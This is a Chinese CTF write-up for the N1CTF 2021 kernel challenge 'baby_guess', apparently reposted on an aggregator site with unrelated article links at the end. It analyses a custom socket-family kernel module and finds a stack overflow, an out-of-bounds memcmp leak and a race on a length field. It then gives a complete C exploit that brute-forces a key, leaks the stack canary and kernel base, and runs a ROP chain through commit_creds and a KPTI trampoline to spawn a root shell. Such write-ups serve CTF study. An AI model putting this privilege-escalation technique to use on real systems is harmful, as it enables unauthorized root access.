N1CTF 2021 -- baby_guess

前言

这个题目与之前做的有所不同,题目并不是创建的一个字符设备或 misc 设备,而是注册了一个新的协议。但是就利用而言跟之前没啥区别,由于不是搞内核开发的,就简单看了看相关的知识

题目分析

  • 内核版本:v5.4.142
  • smap/smep/kaslr/kpti 全开
  • 内核栈溢出

题目注册了一个新的协议,family15

__int64 __fastcall init_module()
{
  _fentry__();
  get_random_bytes(magic_key, 256LL);
  proto_register(&proto, 1LL);
  sock_register(&net_family_ops);
  return 0LL;
}

这里 magic_key 是一个 256 字节的随机序列,然后注册 proto/sock,其中 net_family_ops 结构如下:

00000000 net_proto_family struc ; (sizeof=0x18, mappedto_5)
00000000                               ; XREF: .rodata:net_family_ops/r
00000000 family dd ?
00000004 field_4 dd ?
00000008 create dq ?                   ; offset
00000010 owner dq ?                    ; offset
00000018 net_proto_family ends

.rodata:0000000000001130                               ; struct net_proto_family net_family_ops
.rodata:0000000000001130 0F 00 00 00 00 00 00 00 B2 0D+net_family_ops net_proto_family <0Fh, 0, offset magic_create, offset __this_module>
.rodata:0000000000001130 00 00 00 00 00 00 00 1C 00 00+                              ; DATA XREF: init_module+2B↑o

所以这里的 family = 0xf,然后跟进其对应的 create 函数:

__int64 __fastcall magic_create(void *net, struct socket *socket, int protocol, int kern)
{
  unsigned int v4; // ecx
  __int64 sock; // [rsp-10h] [rbp-10h]

  _fentry__();
  sock = sk_alloc(net, 15LL, 0xCC0LL, &proto, v4);
  if ( !sock )
    return 0xFFFFFFF4LL;
  socket->ops = (__int64)&socket_proto_ops;
  sock_init_data(socket, sock);
  *(_WORD *)(sock + 16) = 15;                   // family
  return 0LL;
}

可以看到这里设置了 socketops 字段,其中 socket_proto_ops 结构如下:

.rodata:0000000000001040 0F 00 00 00                   socket_proto_ops dd 0Fh       ; DATA XREF: magic_create+54↑o
.rodata:0000000000001044 00 00 00 00                   dd 0
.rodata:0000000000001048 00 1C 00 00 00 00 00 00       dq offset __this_module
.rodata:0000000000001050 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001058 40 22 00 00 00 00 00 00       dq offset sock_no_bind
.rodata:0000000000001060 E0 21 00 00 00 00 00 00       dq offset sock_no_connect
.rodata:0000000000001068 58 22 00 00 00 00 00 00       dq offset sock_no_socketpair
.rodata:0000000000001070 20 22 00 00 00 00 00 00       dq offset sock_no_accept
.rodata:0000000000001078 88 22 00 00 00 00 00 00       dq offset sock_no_getname
.rodata:0000000000001080 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001088 42 08 00 00 00 00 00 00       dq offset socket_ioctl
.rodata:0000000000001090 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001098 00 00 00 00 00 00 00 00       dq 0
.rodata:00000000000010A0 28 22 00 00 00 00 00 00       dq offset sock_no_listen
.rodata:00000000000010A8 18 22 00 00 00 00 00 00       dq offset sock_no_shutdown
.rodata:00000000000010B0 F3 07 00 00 00 00 00 00       dq offset socket_setsockopt
.rodata:00000000000010B8 A0 22 00 00 00 00 00 00       dq offset sock_no_getsockopt
.rodata:00000000000010C0 00 00 00 00 00 00 00 00       dq 0
.rodata:00000000000010C8 00 00 00 00 00 00 00 00       dq 0
.rodata:00000000000010D0 D0 21 00 00 00 00 00 00       dq offset sock_no_sendmsg
.rodata:00000000000010D8 68 22 00 00 00 00 00 00       dq offset sock_no_recvmsg
.rodata:00000000000010E0 70 22 00 00 00 00 00 00       dq offset sock_no_mmap
.rodata:00000000000010E8 78 22 00 00 00 00 00 00       dq offset sock_no_sendpage
.rodata:00000000000010F0 00 00 00 00 00 00 00 00       dq 0
.rodata:00000000000010F8 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001100 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001108 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001110 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001118 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001120 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001128 00 00 00 00 00 00 00 00       dq 0
.rodata:0000000000001130                               ; struct net_proto_family net_family_ops

所以这里其实就定义了 socket_ioctlsocket_setsockopt 两个交互函数,先跟进 socket_setsockopt 函数:

int __fastcall socket_setsockopt(__int64 socket, __int32 level, __int32 optname, __int64 optval, uint32_t optlen)
{
  int optname_; // edx
  __int64 optval_; // rcx
  int v8; // [rsp-Ch] [rbp-Ch]

  _fentry__();
  if ( optname_ == 0xDEADBEEF )
    return enc(optval_);
  if ( optname_ == 0x13371337 )
    return 0x1337;
  return v8;
}

其有效功能就只有一个,跟进 enc 函数:

__int64 __fastcall enc(__int64 a1)
{
  int i; // [rsp-44h] [rbp-44h]
  __int64 v3; // [rsp-38h] [rbp-38h]
  __int64 len; // [rsp-20h] [rbp-20h]

  _fentry__();
  v3 = dev_info.len;
  len = dev_info.len;
  if ( dev_info.len > 0x7FFFFFFFuLL )           // dev_info.len 的值在 [0, 0x7fffffff] 都是合法的,所以如果可以将 dev_info.len 修改为一个较大的值就可以实现越界写了
    BUG();
  nop((__int64)dev_info.data, dev_info.len, 0);
  if ( copy_from_user(dev_info.data, a1, len) )
    return -22LL;
  for ( i = 0; i <= 255; ++i )
    dev_info.data[i] ^= magic_key[i];
  return v3;
}

可以看到该函数主要就是向 dev_info.data 中写入数据,这里 dev_info 结构如下:

00000000 node struc ; (sizeof=0x108, mappedto_3)
00000000                               ; XREF: .bss:dev_info/r
00000000 len dq ?                      ; XREF: set_len+11/r
00000000                               ; set_len+20/w ...
00000008 data db 256 dup(?)
00000108 node ends

.bss:00000000000020C0                               public dev_info
.bss:00000000000020C0                               ; struct node dev_info
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+dev_info node <?>             ; DATA XREF: set_len+11↑r
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; set_len+20↑w
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; set_len+41↑w
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; enc+11↑r
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; enc+20↑o
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; enc+12C↑r
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; enc+146↑w
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; sub_2CF+340↑o
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+                              ; socket_ioctl+386↑o
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+_bss ends
.bss:00000000000020C0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+

可以看到这里的 data 域的大小为 255,而 enc 检查 dev_info.len 的时候是检查其是否在 [0, 0x7fffffff] 之间,所以这里如果 dev_info.len > 255 则导致越界写入 dev_info.len

然后跟进 socket_ioctl 函数:

int __fastcall socket_ioctl(__int64 socket, int cmd, __int64 arg)
{
  __int64 v3; // rbp
  unsigned __int64 arg3_len; // rdx
  unsigned __int64 agr3_req; // [rsp-1E0h] [rbp-1E0h]
  int v7; // [rsp-1C4h] [rbp-1C4h]
  unsigned __int64 len; // [rsp-1A8h] [rbp-1A8h]
  int64_t llen; // [rsp-1A8h] [rbp-1A8h]
  __int64 buf; // [rsp-170h] [rbp-170h]
  __int64 bbuf; // [rsp-148h] [rbp-148h]
  int64_t lllen; // [rsp-140h] [rbp-140h]
  struct req req; // [rsp-128h] [rbp-128h] BYREF
  _BYTE buffer_256[256]; // [rsp-110h] [rbp-110h] BYREF
  unsigned __int64 v15; // [rsp-10h] [rbp-10h]
  __int64 v16; // [rsp-8h] [rbp-8h]

  _fentry__();
  v16 = v3;
  agr3_req = arg3_len;
  v15 = __readgsqword(0x28u);
  v7 = -22;
  if ( cmd == 0x13371001 )
    return set_len(arg3_len);
  if ( cmd != 0x13371002 )
    return v7;
  memset(buffer_256, 0, sizeof(buffer_256));
  nop((__int64)&req, 24LL, 0);
  if ( copy_from_user(&req, agr3_req, 24LL) )
    return 0xFFFFFFEA;
  if ( req.cmd == 0x1337 )
  {
    len = req.len;
    if ( req.len > 256 )                        // 这里是 int64_t 比较,所以可以用负数绕过
      len = 256LL;
    buf = req.buf;
    if ( len > 0x7FFFFFFF )                     // 这里是 uint64_t 比较,而 0x7FFFFFFF 是 int 的最大值,所以负数无法绕过
      BUG();                                    // 就这里而言,其不存在绕过,req.len 似乎必须在[0, 256]之间
    nop((__int64)buffer_256, len, 0);
    if ( copy_from_user(buffer_256, buf, len) )
      return -22;
    if ( !memcmp(dev_info.data, buffer_256, req.len) )// 这里用的 req.len,其可能存在溢出比较?buffer_256 后面的内容不可控
      return req.len;
  }
  else if ( req.cmd == 0x1338 )
  {
    llen = req.len;
    if ( req.len > 256 )
      llen = 256LL;
    bbuf = req.buf;
    lllen = req.len;
    if ( req.len > 0x7FFFFFFFuLL )
      BUG();
    nop((__int64)buffer_256, req.len, 0);
    if ( copy_from_user(buffer_256, bbuf, lllen) )// 这里的 lllen 没有经过 '>256' 的检查,所以其值在[0, 0x7fffffff]之间,存在栈溢出
      return 0xFFFFFFEA;
    if ( !memcmp(magic_key, buffer_256, llen) ) // 这里的 llen 经过了检查,所以这里是正常比较
      return llen;
  }
  return 0;
}

该函数有三个功能,第一个功能是修改 dev_info.len,跟进 set_len 函数:

__int64 __fastcall set_len(unsigned __int64 new_len)
{
  __int64 old_len; // [rsp-10h] [rbp-10h]

  _fentry__();
  old_len = dev_info.len;
  dev_info.len = new_len;                       // 这里是唯一可以设置 dev_info.len 的地方 【1】
  if ( new_len > 256 )                          // 设置 dev_info.len 字段,限制在[0, 256]之间
  {
    printk(&unk_F6C);
    dev_info.len = old_len;
  }
  return 0LL;
}

这个函数是唯一可以设置 dev_info.len 的地方,但是其严格限制了最后 dev_info.len[0, 256] 之间,但是这个有个问题:

  • 这里是先保存了原来 dev_info.len 的值,然后把 new_len 赋值给了 dev_info.len 【1】
  • 后面在检查 new_len 的合法性,如果 new_len 不在 [0, 256] 则恢复 dev_info.len 为原来的值【2】

可以发现对 dev_info.len 的访问并没有上锁,而之前我们说了,enc 函数中对 dev_info.dev 写入的字节数就是 dev_info.len,所以 encset_len 两个函数存在对 dev_info.len 的竞争访问:

  • enc 读取 dev_info.len
  • set_len 在【1】处修改 dev_info.len

所以如果 enc 函数在 set_len 的【1】~【2】之间竞争获取 dev_info.len 的值,则会导致越界写 dev_info.data

正常来说,修改一个变量应该是先检查值是否合法,合法才进行赋值,而不是想上面先进行赋值在检查是否合法

但是这里单纯越界写 dev_info.data 似乎并每有太大的作用,毕竟开启了 kaslr,所以还是得想办法泄漏 kbase。然后看 socket_ioctl 函数的第二个功能:

  if ( req.cmd == 0x1337 )
  {
    len = req.len;
    if ( req.len > 256 )                        // 这里是 int64_t 比较,所以可以用负数绕过
      len = 256LL;
    buf = req.buf;
    if ( len > 0x7FFFFFFF )                     // 这里是 uint64_t 比较,而 0x7FFFFFFF 是 int 的最大值,所以负数无法绕过
      BUG();                                    // 就这里而言,其不存在绕过,req.len 似乎必须在[0, 256]之间
    nop((__int64)buffer_256, len, 0);
    if ( copy_from_user(buffer_256, buf, len) )
      return -22;
    if ( !memcmp(dev_info.data, buffer_256, req.len) )// 这里用的 req.len,其可能存在溢出比较?buffer_256 后面的内容不可控
      return req.len;
  }
  ......
  return 0;

可以看到这里的 memcmp 存在越界比较,这里的 req.len 是用户可控的,虽然上面检查了 req.len 但是并没有修改 req.len,而是修改的其副本 len,所以这里的 len 是只能在 [0, 256] 之间,所以这里的 copy_from_user 不存在越界。那么这里的越界比较有什么用呢?答案:可以用来泄漏相关信息

这里的 buffer_256 是一个局部变量,也就是内核栈上的一个地址,而 dev_info.data 我们是可以通过条件竞争去往 dev_info.data+256 后写入数据的,我们知道内核栈上保存着相关的内核地址,所以 buffer_256+256 后面存在大量有用的数量,所以这里可以通过逐字节爆破去泄漏相关内核地址,因为这里如果 memcmp 成功其返回的是 req.len,而失败则返回的是 0,通过其返回值就可以判断某字节是否爆破成功

但是我们知道 dev_info.data 的前 256 字节是经过 magic_key 异或加密过的,所以这里我们得泄漏 magic_key,否则 memcmp 在前 256 字节就比较失败了,从而无法泄漏相关有效消息

然后在看 socket_ioctl 的第三个功能:

  else if ( req.cmd == 0x1338 )
  {
    llen = req.len;
    if ( req.len > 256 )
      llen = 256LL;
    bbuf = req.buf;
    lllen = req.len;
    if ( req.len > 0x7FFFFFFFuLL )
      BUG();
    nop((__int64)buffer_256, req.len, 0);
    if ( copy_from_user(buffer_256, bbuf, lllen) )// 这里的 lllen 没有经过 '>256' 的检查,所以其值在[0, 0x7fffffff]之间,存在栈溢出
      return 0xFFFFFFEA;
    if ( !memcmp(magic_key, buffer_256, llen) ) // 这里的 llen 经过了检查,所以这里是正常比较
      return llen;
  }
  return 0;

这里跟第二个功能的漏洞逻辑差不多,首先是这里的 copy_from_user 存在异常,因为这里的 lllen = req.len,这里只检查了其是否在 [0, 0x7fffffffff],而 buffer_256 的大小为 256 字节,所以这里存在栈溢出。而这里的 llen 是被严格限制在 [0, 256] 之间的,所以这里的 memcmp 不存在溢出比较,但是这里是与 magic_key 进行比较,比较成功则返回 llen,失败返回 0,所以这里也可以直接逐字节爆破 magic_key

泄漏了 magic_key 后,利用上目的第二个功能就可以爆破栈上数据了,所以这里我们存在的原语有:

  • 内核栈溢出
  • dev_info.len 条件竞争

漏洞利用

经过上面的分析,漏洞利用就比较简单了,思路如下:

  • 先爆破泄漏 magic_key
  • 然后利用条件竞争越界修改 dev_info.data,从而爆破泄漏 kcanary/kbase
  • 然后栈溢出布置 rop 链提权

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>

void err_exit(char *msg)
{
        perror(msg);
        sleep(2);
        exit(EXIT_FAILURE);
}

void fail_exit(char *msg)
{
        printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
        sleep(2);
        exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

#define MAGIC 0xF
int fd;
int run = 1;
char key[0x100] = { 0 };
char buf[0x300] = { 0 };
char cmp_buf[0x300] = { 0 };
uint64_t kcanary;
uint64_t kbase;
uint64_t koffset;
uint64_t krbp;

struct req {
        uint64_t cmd;
        uint64_t len;
        void* buf;
};

int set_len(uint64_t len) {
        return ioctl(fd, 0x13371001, len);
}

int cmp(uint64_t len) {
        struct req req = { .cmd = 0x1337, .buf = cmp_buf, .len = len };
        return ioctl(fd, 0x13371002, &req);
}

int copy(uint64_t len) {
        struct req req = { .cmd = 0x1338, .buf = buf, .len = len };
        return ioctl(fd, 0x13371002, &req);
}

int enc() {
        return setsockopt(fd, 0, 0xDEADBEEF, buf, 0);
}

void bruteforce_key() {
        int res;
        memset(buf, 0, sizeof(buf));
        for (int i = 0; i < 256; i++) {
                for (uint32_t j = 0; j <= 0xff; j++) {
                        buf[i] = j;
                        res = copy(i+1);
                        if (res == i+1) {
                                key[i] = j;
                                break;
                        }
                }
        }
}

void enc_buf() {
        for (int i = 0; i < 256; i++) {
                cmp_buf[i] ^= key[i];
        }
}

void* change_len(void* arg) {
        while (run) {
                set_len(0x150);
        }
}

void leak_kbase() {
        int res;
        memset(buf, 0, sizeof(buf));
        memset(cmp_buf, 0, sizeof(cmp_buf));
        enc_buf();
        for (int i = 0; i < 24; i++) {
                for (uint64_t j = 0; j <= 0xff; j++) {
                        buf[256+i] = j;
                        res = enc();
                        while (res != 0x150) {
                                res = enc();
                        }

                        res = cmp(256+i+1);
                        if (res == 256+i+1) {
                                if (i < 8) {
                                        kcanary |= j << i*8;
                                        printf("[+] kcanary: %#llx\n", kcanary);
                                } else if (i > 15) {
                                        kbase |= j << (i-16)*8;
                                        printf("[+] kaddr: %#llx\n", kbase);
                                } else {
                                        krbp |= j << (i-8)*8;
                                }
                                break;
                        }
                }
        }
}

int main(int argc, char** argv, char** envp)
{
        save_status();
        pthread_t thr;

        fd = socket(MAGIC, SOCK_DGRAM, 0);
        if (fd < 0) err_exit("socket");

        bruteforce_key();
        binary_dump("magic_key", key, 256);

        pthread_create(&thr, NULL, change_len, NULL);
        leak_kbase();
        run = 0;
        pthread_join(thr, NULL);

        kbase -= 0x902b1d;
        koffset = kbase - 0xffffffff81000000;
        printf("[+] kbase: %#llx\n", kbase);
        printf("[+] koffset: %#llx\n", koffset);
        uint64_t commit_creds = koffset + 0xffffffff810ca910;
        uint64_t init_cred = koffset + 0xffffffff8265e400;
        uint64_t kpti_trampoline = koffset + 0xffffffff81c00a4a;
        uint64_t pop_rdi = koffset + 0xffffffff8108cbc0;

        uint64_t rop[] = {
                kcanary,krbp,
                pop_rdi,
                init_cred,
                commit_creds,
                kpti_trampoline,
                0,0,
                (uint64_t)get_root_shell,
                0x33,
                0x200,
                user_sp,
                0x2b
        };

        memcpy(buf+0x100, rop, sizeof(rop));
        copy(0x100+sizeof(rop));
        puts("[+] EXP NERVER END!");
        getchar();
        return 0;
}

效果如下:
在这里插入图片描述

总结

题目不算难,主要是最开始对 socket 底层创建不太熟悉,所以分析相关函数如果调用搞了很久,其实跟之前的题目没啥区别

这里利用 memcmp 去爆破泄漏相关地址还挺好的,而且这里的竞争漏洞真的出的好,条件竞争就是出现在对临界区资源的访问上,这里对临界资源 dev_info.len 没有进行相关的互斥机制处理,从而导致读写 dev_info.len 出现了竞争访问

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/610412.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

STM32使用ESP01S连接阿里云物联网平台

一、ESP01S烧录MQTT固件准备 首先准备好烧录工具&#xff0c;可以从官网上进行下载。 MQTT固件官网网址&#xff1a;AT固件汇总 | 安信可科技 (ai-thinker.com) 进去后如下图界面&#xff0c;向下翻找找到MQTT固件&#xff08;1471&#xff09;下载固件即可。 烧录工具光网地…

windows轻松管理nodejs 版本 升/降级 卸载等等

#nvm-windows 管理nodejs 版本神器# 不经意升级了node版本导致原有项目启动异常, 看到了node版本管理神器:nvm-windos 1,先下载 nvm >> git 选择如下安装包或 nvm-setup.exe文件 https://github.com/coreybutler/nvm-windows/releases/tag/1.1.12 2. 双击安装,下一…

DuDuTalk:4G桌面拾音设备在银行网点服务场景的应用价值

随着科技的飞速发展&#xff0c;银行业也在不断地寻求创新以提高服务质量和效率。在这个过程中&#xff0c;4G桌面拾音设备作为一种新型的智能设备&#xff0c;其在银行网点服务场景中的应用价值逐渐凸显出来。本文将从多个角度探讨4G桌面拾音设备在银行网点服务场景的应用价值…

Capl中的运算符

Capl中的运算符类似于C语言。由于capl中没有指针的概念&#xff0c;所以没有指针取值&#xff0c;取地址等运算符。 Capl中的运算符优先级同C语言一样&#xff0c;同样小括号可以 提升优先级。 1.算数运算符 整数类型之间的数据进行除法运算&#xff0c;结果一定是整数。如果…

HTML4(四)

1. 框架标签 <!DOCTYPE html> <html lang"zh-CN"><head><meta charset"UTF-8"><title>框架标签</title></head><body><!-- 利用iframe嵌入一个普通网页 --><iframe src"https://www.toutia…

Python专题:六、循环语句(1)

补充知识 代码的注释 #描述性文字 阅读代码的人更好的理解代码 while循环语句 x<100条件控制语句&#xff0c;Totalx,Total自增加x&#xff0c;x1&#xff0c;x自增加1&#xff0c;x<100此条件满足时&#xff0c;执行while循环&#xff0c;当x101时&#xff0c;x101条…

WebRtc 视频通话,语音通话实现方案

先了解一下流程 和 流程图(chatGpt的回答) 实现 (底层代码实现, 可作为demo熟悉) 小demo <template><div><video ref"localVideo" autoplay muted></video> <!-- 本地视频元素&#xff0c;用于显示本地视频 --><video ref"r…

Threejs 学习笔记 | 灯光与阴影

文章目录 Threejs 学习笔记 | 灯光与阴影如何让灯光照射在物体上有阴影LightShadow - 阴影类的基类平行光的shadow计算投影属性 - DirectionalLightShadow类平行光的投射相机 聚光灯的shadow计算投影属性- SpotLightShadow类聚光灯的投射相机 平行光 DirectionalLight聚光灯 Sp…

企业数据有什么价值?

在当下的数字经济时代&#xff0c;数据已上升为国家重要的基础性战略资源&#xff0c;加快建设数字中国、网络强国这一蓝图的实现&#xff0c;离不开数据要素的支撑。数据作为新型生产要素&#xff0c;具有非消耗性、非竞争性等特征&#xff0c;为突破传统生产要素的增长约束提…

【LeetCode:LCR 077. 排序链表 + 链表】

&#x1f680; 算法题 &#x1f680; &#x1f332; 算法刷题专栏 | 面试必备算法 | 面试高频算法 &#x1f340; &#x1f332; 越难的东西,越要努力坚持&#xff0c;因为它具有很高的价值&#xff0c;算法就是这样✨ &#x1f332; 作者简介&#xff1a;硕风和炜&#xff0c;…

Bpmn.js使用(仅查看版)

Bpmn.js使用&#xff08;仅查看版&#xff09; 下载 npm install bpmn-js创建一个 Dom 节点来挂载画布元素。 <a-tabs v-model:activeKey"activeKey" change"tabsChange"><a-tab-pane key"1" tab"审批记录"><a-tabl…

Spring添加注解读取和存储对象

5大注解 Controller 控制器 Service 服务 Repository 仓库 Componet 组件 Configuration 配置 五大类注解的使用 //他们都是放在同一个目录下&#xff0c;不同的类中 只不过这里粘贴到一起//控制器 Controller public class UserController {public void SayHello(){System.ou…

第十二届蓝桥杯省赛真题 Java C 组【原卷】

文章目录 发现宝藏【考生须知】试题 A: ASC试题 B: 空间试题 C: 卡片试题 D: 相乘试题 E: 路径试题 F: 时间显示试题 G: 最少砝码试题 H : \mathrm{H}: H: 杨辉三角形试题 I: 左孩子右兄弟试题 J : \mathrm{J}: J: 双向排序 发现宝藏 前些天发现了一个巨牛的人工智能学习网站…

Spring如何控制Bean的加载顺序

前言 正常情况下&#xff0c;Spring 容器加载 Bean 的顺序是不确定的&#xff0c;那么我们如果需要按顺序加载 Bean 时应如何操作&#xff1f;本文将详细讲述我们如何才能控制 Bean 的加载顺序。 场景 我创建了 4 个 Class 文件&#xff0c;分别命名为 FirstInitialization Se…

国家软考办:2024年上半年软考考试安排

按照《2024年计算机技术与软件专业技术资格&#xff08;水平&#xff09;考试工作安排及有关事项的通知》&#xff08;计考办〔2024〕1号&#xff09;文件精神&#xff0c;结合各地机位实际&#xff0c;现将2024年上半年计算机软件资格考试有关安排通告如下&#xff1a; 一、考…

代码随想录算法训练营第36期DAY19

DAY19 104二叉树的最大深度 根节点的高度就是最大深度。 非递归法&#xff1a; /** * Definition for a binary tree node. * struct TreeNode { * int val; * TreeNode *left; * TreeNode *right; * TreeNode() : val(0), left(nullptr), right(nullptr) …

Maven的使用

1.第一个Maven工程 1.1 创建约定目录结构 ​ Hello ​ src ​ ——main(存放主程序) ​ ————java(存放源代码文件) ​ ————resources(存放配置文件和资源文件) ​ ——test(存放测试程序) ​ ————java ​ ————resources ​ pom.xml 1.2 创建核心文件 pom.xml …

知识竞赛奖品买什么好,不是贵的就好

知识竞赛奖品分精神奖品和物质奖品两种&#xff0c;两种缺一不同&#xff0c;精神奖品主要是荣誉证书和奖牌或奖杯之类&#xff0c;满足选手精神需要&#xff0c;另外&#xff0c;物质奖品也不可以少&#xff0c;否则选手没有参与积极性&#xff0c;物质奖品可以是奖金或奖品&a…

如何确保UDP文件传输工具有最低稳定的传输速度?

在当前日新月异的数字时代背景下&#xff0c;文件传输工具已经成为我们日常生活与工作中不可或缺的一部分&#xff0c;尤其针对那些频繁涉及即时数据交互与多媒体流通的场景。 UDP协议&#xff0c;以其突出的高速传输与低延迟特性&#xff0c;脱颖而出成为众多用户的首选。不过…

Whistle 在手机上配置代理

1、运行Whistle w2 start 在浏览器打开 http://127.0.0.1:8899/#rules 2、点击https展示whistle下载二维码&#xff0c;用手机浏览器扫码下载并安装rootCA.crt 证书 安装时选择【用于VPN和应用】 3、与电脑连接同一网络WiFi&#xff0c;右键修改网络&#xff0c; 显示高级选…
最新文章